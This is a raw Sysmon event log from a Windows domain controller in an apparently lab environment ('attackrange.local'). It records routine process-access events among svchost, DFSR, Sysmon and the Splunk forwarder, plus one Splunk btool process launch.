08:41:23.386{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.386{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16B1-5F84-2D00-000000007F01}25043300C:\Windows\system32\DFSRs.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4600-000000007F01}4060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4600-000000007F01}4060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16B3-5F84-4500-000000007F01}40404044C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B3-5F84-4600-000000007F01}4060C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.376{5D479F2C-16B3-5F84-4600-000000007F01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B3-5F84-4500-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4500-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 